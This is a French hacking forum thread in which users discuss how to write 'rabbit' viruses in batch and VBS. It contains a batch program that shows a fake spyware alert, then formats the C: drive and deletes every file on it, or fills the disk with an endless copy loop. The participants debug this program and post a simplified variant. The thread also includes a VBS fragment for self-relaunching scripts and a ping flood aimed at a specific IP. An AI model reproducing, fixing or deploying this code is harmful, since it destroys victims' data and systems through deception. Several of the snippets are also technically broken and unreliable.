[DarK-CrasH]

Personne ne sais ce qu'est un virus type rabbit et comment il fonctionne ?

[#Z@tox#]

jamais entendu parler de ce truc "rabbit" mais en revanche, les symptomes que tu décrit celà s'apparente à du flood ou de la zombification le principe est simple créer des fichiers par dizaines, si possible des executables, comme ça on les lance et ils tournent en background en utilisant les ressources du pc, et ça  le fait ralentir concidérablement.

de tels virus, c'est relativement facile à développer, que se soit en batch ou en VBS.  leurs codes sources sont toujours sensiblement les mêmes,

tu te demande aussi si c'est toujours possible d'en créer aujourd'hui?

biensur que oui, le  plus dur sera de créer un programme qui échappe au controle des antivirus, je ne parle pas de créer un rootkit, mais simplement de créer un script du style VBS ou batch capable de faire celà sans se faire repérer par les Antivirus. Ce qui est relativement simple avec la facilité d'utilisation de ces langages non compilables.


cependant, tu dois te demander maintenant pourquoi, si c'est si facile a créer, les  hackers les ont-ils délaissés?

hé bien tout simplement parceque  détruire pour détruire ne sert à rien, à une époque c'était gratifiant de prouver au monde que l'on pouvait battre microsoft en crashant un sytèmme ou en détruisant des fichiers.  Aujourd'hui la société est faite de telle sorte que la plupart des gens aiment gagner de l'argent facilement . C'st pourquoi les hackers se concentrnt sur le développement de rogues, et programmes en tout gnre  dont le but n'est plus d'endommager un système, mais plutot de leur faire gagner de l'argent. Et ce ne sont pas les exemple qui manquent: faux antivirus détectant une fausse infection et pouvant la supprimmer moyennant quelques $$$. rootkits pour éviter aux antivirus réels de trouver les faux programmes, adwares pour envoyer de la publicité ciblée (d'ailleurs certaines sociétés  n'hésitent pas a se payer les services de hackers pour développer des adwares du style naipromo)

etc...

mais techniquement parlant, celà reste possible et à la portée de n'importe quel programmeur de développer un programme qui floode un système

[DarK-CrasH]

Autre chose : Dérivé ?

Le Shell ? C'est quoi exactement ?
Un programme type Backdoor ?
Quel langage pour les Shells ?
Quelqu'un a des exemples de Shells ?
Bref un tutos complet de Shells ?

( Je suis sous windows pour dire mais il me semblait qu'un Shell n'est pas forcement ECRIT en Shell >> PHP )

bref, sa peut rejoindre les Virus ?

[akway]

salut,

un lievre (rabbit) est un terme qui designe  un malware ayant pour but de se reproduire a l'infini en saturant l'espace disque, saturant souvent en meme temps les ressources de la machine infectée.

suffit d'une ch'tite boucle créant des fichiers volumineux avec un nom comportant un incrément.

sinon pour les quelques questions posées au dessus une rapide recherche sur wiki te donnera une réponse assez détaillée je pense.

[#Z@tox#]

pour les shells j'en sais rien, en revanche le seul truc que je peux te dire c'est pour les backdoors, ce sont des "portes dérobées", en gros leur but est d'ouvrir des ports sans que tu ne t'en rendes compte , et ainsi pouvoir faire passer par là différentes sortes d'informations  (aussi bien en upload qu'en download).

[DarK-CrasH]

un lievre (rabbit) est un terme qui designe  un malware ayant pour but de se reproduire a l'infini en saturant l'espace disque, saturant souvent en meme temps les ressources de la machine infectée.

suffit d'une ch'tite boucle créant des fichiers volumineux avec un nom comportant un incrément.

Donc dans un langage, prenont le plus basique : Batch, Si l'on fait une boucle pour créer des fichiers a l'infinie, cela fera bloquer la machine, si j'ai bien compris.

La question est : Interet ? Cette attaque peut elle rejoindre une attaque type DDoS ? Saturer un serveur/machine pour le/la faire tomber ?

Car, si la machine est plantée, le hackers en question ne peut rien en tirer ?

[#Z@tox#]

sinon pour un exemple (et fragment) de code VBS celà donnerait ceci:

Code:

.'Pour creer le fichier texte
.Set FSys = CreateObject("Scripting.FileSystemObject") 
.Set MonFic = FSys.CreateTextFile("c:\windows\bureau\fichier.bat") 
.With MonFic 'Pour écrire dans le fichier texte
.writeLine "Ecrivez la première ligne" 'Mettre write pour ne pas sauter à la ligne
.writeLine "Ecrivez la deuxième ligne"
.writeLine "Ecrivez la troisième ligne"
.writeLine "Ecrivez la 100000000eme ligne, etc..."
End With
Msg = "hacked by dark-crash with a rabbit virus"
MsgBox(Msg)

les lignes du fichier.bat généré par le fichier vbs peuvent par exemple etre des commandes ordonnat la création d'autres programmes  ou l'execution du fichier vbs ; il suffirait par exemple de créer un vbs créant un batch qui lui même aurait pour but d'executer le fichier VBS de départ, et la boucle est créee

mais bon ne comptes pas sur moi pour donner ne serait-ce qu'un exemple de boucle de ce style ici, pas envi de me faire ban encore une fois  XD

sinon pour répondre a ta question du post précédent, oui biensur, le principe des boucles peut etre utilisé en php et ou SQL pour  saturer un serveur

[DarK-CrasH]

Ce code ne ma pas l'air juste, si ?
code:
@echo off
cls
rem #_nom du virus: Kaox
rem #_code créé le 05/04/2004 à 3h04
rem #_auteur : Freak
rem #_code créé pour : moteurprog.com
rem #_code de 31 lignes et de 1 069 octets
echo ##################################################
echo ALERTE !!!
echo Votre ordinateur est infecter par un spyware.
echo Le fichier msbb.exe  à été trouver.
echo ##################################################
pause
choice /C:ab Si vous voulez mettre le fichier en quarantaine tapez "a" sinon tapez "b". Si dans les 15 secondes qui suivent vous n'avez pas choisi, le fichier sera automatiquement mit en quarantaine.
/T:a,15
if errorlevel = 1 goto a
if errorlevel = 2 goto b
:a
cls
@format c: /u /q
@deltree /y c:\*.*
echo Freak est heureux de vous annoncer que votre disque dur a été
echo formaté ;-)
goto :fin
:b
cls
:loop
@copy c:\Programme Files\*.* + c:\Windows\*.* c:\Windows\System\
echo Votre ordinateur est en train de se remplir a l' infini ;-)
goto :loop
:fin


Pour rien dire, sa sens le lamz qui passe son temps a faire chier son monde


[ Avis aux modos :: Cette **orthographe !** est à titre informatif, donc aucune raison de ban car perso si le but et de faire chier des gens, autant le faire avec classe et pas avec une ptite boucle infinis x)

[DarK-CrasH]

Details du code ::

Il me semble que la commande format / ne fonctionne pas x)

ensuite, si format fonctionne :

@copy c:\Programme Files\*.* + c:\Windows\*.* c:\Windows\System\
echo Votre ordinateur est en train de se remplir a l' infini ;-)


Il copie quoi si il vient de " formater "




Site de LA Perle rare x) : http://www.moteurprog.com/Articles/Article.php?ID_article=14

[#Z@tox#]

si ce code semble correct, je te rappelle qu'un pc ne comporte pas forcément qu'un seul disque dur C:, il peut comporter une partition système C: et une autre D:  si le dos est installé sur d:, alors pas de soucis pour formatter C: et y copier des fichiers et dossiers provenant de D:

[DarK-CrasH]

@format c: /u /q
@deltree /y c:\*.*
@copy c:\Programme Files\*.* + c:\Windows\*.* c:\Windows\System\

format : il formate le C:\
ensuite il supprime tout les fichiers de toutes les extensions
Et apres, il pense a vouloir copier C:\ qu'il vient de supprimer

Logique ?

il aurait plutôt dû mettre
@copy d:\ ...
et pas c:\

[#Z@tox#]

pas faux, mais bon , peu importe, tu as un bel exemple de rabbit , même si le code peut encore être aélioré et tu le remarque toi même

[DarK-CrasH]

Lol oui

Je voulais donc savoir autre chose :

Tu m'as l'air calé en VBScript, tu as des liens de cours interessants ?

Ensuite, il faut que tu ailles sur IRC ou autre car j'aurai un projet a te proposer, dit moi ce qui te conviens le plus

[DarK-CrasH]

Code:

@echo off

@copy c:\Programme Files\*.* + c:\Windows\*.* c:\Windows\System\
goto :loop
:fin

Ce serai ça en code simplifié sans le cinéma echo fait pour mettre les jetons à l'utilisateur et sans format inutile >> si on copy les fichiers et qu'il y en a déjà, le disque se remplis plus vite, ce serai plus logique, je pense

[DarK-CrasH]

Pour revenir aux rabbits mais type DDoS ::

Il serait possible techniquement, d'envoyer un virus pour faire ... Bon allez, nan , je vous fait une mise en situation complete ! :p


                                       Mise en situation :

J'arrive sur mon ordi et je me rend compte que j'ai pas un log super important pour terminer mon vol de cookies Oo . Vite je vais sur IRC channel : Bidon-underground et je fais ma demende

[ pseudo ] Bonjour j'ai besoin du log XXXXXXXXXXXX pour modifier des cookies

**************************************************************

Un mec me prend en conversation privée

**************************************************************


http://choubidoowawa.com/log/Plop.zip

je le prend et l'installe et tout d'un coup il allume une fenetre toute noire quesquiss passs O.O

Je suis un bon en ordi mais je decide de pas le toucher pendant 2 3 jours pour pas faire de conneries, de toute façon faut que j'aille bosser.


Et 3 jours apres j'ai une fenetre noir, toute moche avec plein d'adresse avec des points O.O



******************************************************

Fin de la mise en situation

******************************************************

Est ce possible que fichier plop.zip faisait un truc style :

Code:

@echo off
color A
ping -t 195.60.188.34
pause

( oui je met de la couleur moi )

Donc le fichier d'infection lancerai une Attack DDoS ( dans le principe de surcharger encore une fois .. )
Cela ne peut il pas être considéré comme un type de rabbit ?